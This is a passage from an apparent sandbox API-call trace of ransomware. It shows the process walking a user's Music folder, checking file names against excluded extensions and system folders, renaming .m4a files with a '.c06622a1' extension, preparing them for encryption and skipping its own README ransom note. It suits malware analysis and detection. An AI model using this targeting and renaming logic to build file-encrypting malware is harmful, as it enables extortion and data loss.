(_String="diagcab") returned 0x7 [0150.486] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.486] wcslen (_String="diagcfg") returned 0x7 [0150.486] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.486] wcslen (_String="diagpkg") returned 0x7 [0150.486] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.486] wcslen (_String="dll") returned 0x3 [0150.486] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.486] wcslen (_String="drv") returned 0x3 [0150.486] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.486] wcslen (_String="exe") returned 0x3 [0150.486] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.486] wcslen (_String="hlp") returned 0x3 [0150.486] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.487] wcslen (_String="icl") returned 0x3 [0150.487] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.487] wcslen (_String="icns") returned 0x4 [0150.487] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.487] wcslen (_String="ico") returned 0x3 [0150.487] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.487] wcslen (_String="ics") returned 0x3 [0150.487] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.487] wcslen (_String="idx") returned 0x3 [0150.487] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.487] wcslen (_String="ldf") returned 0x3 [0150.487] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.487] wcslen (_String="lnk") returned 0x3 [0150.487] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.487] wcslen (_String="mod") returned 0x3 [0150.487] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.487] wcslen (_String="mpa") returned 0x3 [0150.487] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.487] wcslen (_String="msc") returned 0x3 [0150.487] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.487] wcslen (_String="msp") returned 0x3 [0150.487] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.487] wcslen (_String="msstyles") returned 0x8 [0150.487] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.487] wcslen (_String="msu") returned 0x3 [0150.487] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.487] wcslen (_String="nls") returned 0x3 [0150.487] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.487] wcslen (_String="nomedia") returned 0x7 [0150.487] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.487] wcslen (_String="ocx") returned 0x3 [0150.487] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.487] wcslen (_String="prf") returned 0x3 [0150.487] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.487] wcslen (_String="ps1") returned 0x3 [0150.487] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.487] wcslen (_String="rom") returned 0x3 [0150.487] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.487] wcslen (_String="rtp") returned 0x3 [0150.488] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.488] wcslen (_String="scr") returned 0x3 [0150.488] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.488] wcslen (_String="shs") returned 0x3 [0150.488] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.488] wcslen (_String="spl") returned 0x3 [0150.488] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.488] wcslen (_String="sys") returned 0x3 [0150.488] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.488] wcslen (_String="theme") returned 0x5 [0150.488] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.488] wcslen (_String="themepack") returned 0x9 [0150.488] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.488] wcslen (_String="wpx") returned 0x3 [0150.488] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.488] wcslen (_String="lock") returned 0x4 [0150.488] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.488] wcslen (_String="key") returned 0x3 [0150.488] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.488] wcslen (_String="hta") returned 0x3 [0150.488] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.488] wcslen (_String="msi") returned 0x3 [0150.488] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.488] wcslen (_String="pdb") returned 0x3 [0150.488] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.488] wcslen (_String="sql") returned 0x3 [0150.488] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.488] wcslen (_String="sqlite") returned 0x6 [0150.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 0x10 [0150.488] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.488] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" [0150.488] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned 0x33 [0150.488] wcscpy (in: _Dest=0x45000f8, _Source="kakWe5.m4a" | out: _Dest="kakWe5.m4a") returned="kakWe5.m4a" [0150.488] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a", dwFileAttributes=0x80) returned 1 [0150.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\kakwe5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0150.489] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.489] ReadFile (in: hFile=0x368, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0150.490] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x72e840e2 [0150.490] RtlComputeCrc32 (PartialCrc=0x40e2, Buffer=0x3fe8f4, Length=0x80) returned 0xc4d5fcf7 [0150.490] RtlComputeCrc32 (PartialCrc=0xfcf7, Buffer=0x3fe8f4, Length=0x80) returned 0xf15c29da [0150.490] RtlComputeCrc32 (PartialCrc=0x29da, Buffer=0x3fe8f4, Length=0x80) returned 0xff570d59 [0150.490] RtlComputeCrc32 (PartialCrc=0xd59, Buffer=0x3fe8f4, Length=0x80) returned 0x43eae983 [0150.490] CloseHandle (hObject=0x368) returned 1 [0150.490] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.490] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a" [0150.490] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a") returned 0x3e [0150.490] wcscpy (in: _Dest=0x4510114, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.490] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\kakwe5.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\kakwe5.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\kakWe5.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\kakwe5.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0150.492] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.492] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0150.497] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc6f484d [0150.497] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x363e0515 [0150.497] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d8115d6 [0150.497] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25299f30 [0150.497] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28eb025d [0150.498] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x175fa7e9 [0150.498] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41d2de34 [0150.498] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x634e174a [0150.501] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x68efca8f [0150.501] RtlComputeCrc32 (PartialCrc=0xca8f, Buffer=0x4280094, Length=0x80) returned 0x8afa2858 [0150.501] RtlComputeCrc32 (PartialCrc=0x2858, Buffer=0x4280094, Length=0x80) returned 0x8ad092a [0150.501] RtlComputeCrc32 (PartialCrc=0x92a, Buffer=0x4280094, Length=0x80) returned 0xfffe51ec [0150.501] RtlComputeCrc32 (PartialCrc=0x51ec, Buffer=0x4280094, Length=0x80) returned 0xc81209a3 [0150.501] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.501] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.501] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.501] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2339220, ftCreationTime.dwHighDateTime=0x1d5e6dc, ftLastAccessTime.dwLowDateTime=0x9e189cf0, ftLastAccessTime.dwHighDateTime=0x1d5d889, ftLastWriteTime.dwLowDateTime=0x9e189cf0, ftLastWriteTime.dwHighDateTime=0x1d5d889, nFileSizeHigh=0x0, nFileSizeLow=0x4d26, dwReserved0=0x0, dwReserved1=0x0, cFileName="m1 6-.m4a", cAlternateFileName="M16-~1.M4A")) returned 1 [0150.501] _wcsicmp (_Str1="m1 6-.m4a", _Str2="README.c06622a1.TXT") returned -5 [0150.501] wcsstr (_Str="m1 6-.m4a", _SubStr="README") returned 0x0 [0150.501] _wcsicmp (_Str1="autorun.inf", _Str2="m1 6-.m4a") returned -12 [0150.501] wcslen (_String="autorun.inf") returned 0xb [0150.501] _wcsicmp (_Str1="boot.ini", _Str2="m1 6-.m4a") returned -11 [0150.501] wcslen (_String="boot.ini") returned 0x8 [0150.501] _wcsicmp (_Str1="bootfont.bin", _Str2="m1 6-.m4a") returned -11 [0150.501] wcslen (_String="bootfont.bin") returned 0xc [0150.501] _wcsicmp (_Str1="bootsect.bak", _Str2="m1 6-.m4a") returned -11 [0150.501] wcslen (_String="bootsect.bak") returned 0xc [0150.501] _wcsicmp (_Str1="desktop.ini", _Str2="m1 6-.m4a") returned -9 [0150.501] wcslen (_String="desktop.ini") returned 0xb [0150.501] _wcsicmp (_Str1="iconcache.db", _Str2="m1 6-.m4a") returned -4 [0150.501] wcslen (_String="iconcache.db") returned 0xc [0150.501] _wcsicmp (_Str1="ntldr", _Str2="m1 6-.m4a") returned 1 [0150.501] wcslen (_String="ntldr") returned 0x5 [0150.501] _wcsicmp (_Str1="ntuser.dat", _Str2="m1 6-.m4a") returned 1 [0150.501] wcslen (_String="ntuser.dat") returned 0xa [0150.501] _wcsicmp (_Str1="ntuser.dat.log", _Str2="m1 6-.m4a") returned 1 [0150.501] wcslen (_String="ntuser.dat.log") returned 0xe [0150.501] _wcsicmp (_Str1="ntuser.ini", _Str2="m1 6-.m4a") returned 1 [0150.501] wcslen (_String="ntuser.ini") returned 0xa [0150.502] _wcsicmp (_Str1="thumbs.db", _Str2="m1 6-.m4a") returned 7 [0150.502] wcslen (_String="thumbs.db") returned 0x9 [0150.502] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.502] wcslen (_String="386") returned 0x3 [0150.502] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.502] wcslen (_String="adv") returned 0x3 [0150.502] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.502] wcslen (_String="ani") returned 0x3 [0150.502] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.502] wcslen (_String="bat") returned 0x3 [0150.502] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.502] wcslen (_String="bin") returned 0x3 [0150.502] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.502] wcslen (_String="cab") returned 0x3 [0150.502] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.502] wcslen (_String="cmd") returned 0x3 [0150.502] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.502] wcslen (_String="com") returned 0x3 [0150.502] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.502] wcslen (_String="cpl") returned 0x3 [0150.502] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.502] wcslen (_String="cur") returned 0x3 [0150.502] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.502] wcslen (_String="deskthemepack") returned 0xd [0150.502] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.502] wcslen (_String="diagcab") returned 0x7 [0150.502] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.502] wcslen (_String="diagcfg") returned 0x7 [0150.502] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.502] wcslen (_String="diagpkg") returned 0x7 [0150.502] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.502] wcslen (_String="dll") returned 0x3 [0150.502] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.502] wcslen (_String="drv") returned 0x3 [0150.502] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.502] wcslen (_String="exe") returned 0x3 [0150.502] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.502] wcslen (_String="hlp") returned 0x3 [0150.503] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.503] wcslen (_String="icl") returned 0x3 [0150.503] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.503] wcslen (_String="icns") returned 0x4 [0150.503] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.503] wcslen (_String="ico") returned 0x3 [0150.503] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.503] wcslen (_String="ics") returned 0x3 [0150.503] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.503] wcslen (_String="idx") returned 0x3 [0150.503] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.503] wcslen (_String="ldf") returned 0x3 [0150.503] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.503] wcslen (_String="lnk") returned 0x3 [0150.503] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.503] wcslen (_String="mod") returned 0x3 [0150.503] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.503] wcslen (_String="mpa") returned 0x3 [0150.503] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.503] wcslen (_String="msc") returned 0x3 [0150.503] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.503] wcslen (_String="msp") returned 0x3 [0150.503] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.503] wcslen (_String="msstyles") returned 0x8 [0150.503] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.503] wcslen (_String="msu") returned 0x3 [0150.503] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.503] wcslen (_String="nls") returned 0x3 [0150.503] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.503] wcslen (_String="nomedia") returned 0x7 [0150.503] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.503] wcslen (_String="ocx") returned 0x3 [0150.503] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.503] wcslen (_String="prf") returned 0x3 [0150.503] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.503] wcslen (_String="ps1") returned 0x3 [0150.503] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.503] wcslen (_String="rom") returned 0x3 [0150.504] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.504] wcslen (_String="rtp") returned 0x3 [0150.504] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.504] wcslen (_String="scr") returned 0x3 [0150.504] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.504] wcslen (_String="shs") returned 0x3 [0150.504] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.504] wcslen (_String="spl") returned 0x3 [0150.504] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.504] wcslen (_String="sys") returned 0x3 [0150.504] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.504] wcslen (_String="theme") returned 0x5 [0150.504] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.504] wcslen (_String="themepack") returned 0x9 [0150.504] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.504] wcslen (_String="wpx") returned 0x3 [0150.504] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.504] wcslen (_String="lock") returned 0x4 [0150.504] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.504] wcslen (_String="key") returned 0x3 [0150.504] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.504] wcslen (_String="hta") returned 0x3 [0150.504] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.504] wcslen (_String="msi") returned 0x3 [0150.504] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.504] wcslen (_String="pdb") returned 0x3 [0150.504] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.504] wcslen (_String="sql") returned 0x3 [0150.504] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.504] wcslen (_String="sqlite") returned 0x6 [0150.504] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 0x10 [0150.504] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.504] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" [0150.504] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned 0x33 [0150.505] wcscpy (in: _Dest=0x45000f8, _Source="m1 6-.m4a" | out: _Dest="m1 6-.m4a") returned="m1 6-.m4a" [0150.505] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a", dwFileAttributes=0x80) returned 1 [0150.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\m1 6-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0150.505] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.505] ReadFile (in: hFile=0x644, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0150.506] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x4b7db044 [0150.506] RtlComputeCrc32 (PartialCrc=0xb044, Buffer=0x3fe8f4, Length=0x80) returned 0x549e0728 [0150.506] RtlComputeCrc32 (PartialCrc=0x728, Buffer=0x3fe8f4, Length=0x80) returned 0x2a45fe95 [0150.506] RtlComputeCrc32 (PartialCrc=0xfe95, Buffer=0x3fe8f4, Length=0x80) returned 0xbc254aaf [0150.506] RtlComputeCrc32 (PartialCrc=0x4aaf, Buffer=0x3fe8f4, Length=0x80) returned 0xa61859f7 [0150.506] CloseHandle (hObject=0x644) returned 1 [0150.506] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.506] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a" [0150.506] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a") returned 0x3d [0150.506] wcscpy (in: _Dest=0x4510112, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.506] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\m1 6-.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\m1 6-.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\m1 6-.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\m1 6-.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0150.509] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.509] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0150.514] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6204b985 [0150.514] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51eac45f [0150.514] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29b54975 [0150.514] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5631da1b [0150.515] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x447968ce [0150.515] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b1713b2 [0150.515] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7404010 [0150.515] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4aa1d511 [0150.518] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xb59c130c [0150.518] RtlComputeCrc32 (PartialCrc=0x130c, Buffer=0x4670094, Length=0x80) returned 0x1fb809f9 [0150.518] RtlComputeCrc32 (PartialCrc=0x9f9, Buffer=0x4670094, Length=0x80) returned 0xa5e415dc [0150.518] RtlComputeCrc32 (PartialCrc=0x15dc, Buffer=0x4670094, Length=0x80) returned 0xc82498f8 [0150.518] RtlComputeCrc32 (PartialCrc=0x98f8, Buffer=0x4670094, Length=0x80) returned 0x46250d78 [0150.518] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.518] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.518] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.518] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8487200, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd8487200, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd8487200, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.518] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.518] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ec52730, ftCreationTime.dwHighDateTime=0x1d5e32a, ftLastAccessTime.dwLowDateTime=0xb64378d0, ftLastAccessTime.dwHighDateTime=0x1d5db41, ftLastWriteTime.dwLowDateTime=0xb64378d0, ftLastWriteTime.dwHighDateTime=0x1d5db41, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sp6AE4NZCo52aGrKxD", cAlternateFileName="SP6AE4~1")) returned 1 [0150.518] _wcsicmp (_Str1="$recycle.bin", _Str2="sp6AE4NZCo52aGrKxD") returned -79 [0150.518] wcslen (_String="$recycle.bin") returned 0xc [0150.518] _wcsicmp (_Str1="config.msi", _Str2="sp6AE4NZCo52aGrKxD") returned -16 [0150.518] wcslen (_String="config.msi") returned 0xa [0150.518] _wcsicmp (_Str1="$windows.~bt", _Str2="sp6AE4NZCo52aGrKxD") returned -79 [0150.518] wcslen (_String="$windows.~bt") returned 0xc [0150.518] _wcsicmp (_Str1="$windows.~ws", _Str2="sp6AE4NZCo52aGrKxD") returned -79 [0150.518] wcslen (_String="$windows.~ws") returned 0xc [0150.518] _wcsicmp (_Str1="windows", _Str2="sp6AE4NZCo52aGrKxD") returned 4 [0150.518] wcslen (_String="windows") returned 0x7 [0150.518] _wcsicmp (_Str1="appdata", _Str2="sp6AE4NZCo52aGrKxD") returned -18 [0150.518] wcslen (_String="appdata") returned 0x7 [0150.518] _wcsicmp (_Str1="application data", _Str2="sp6AE4NZCo52aGrKxD") returned -18 [0150.518] wcslen (_String="application data") returned 0x10 [0150.518] _wcsicmp (_Str1="boot", 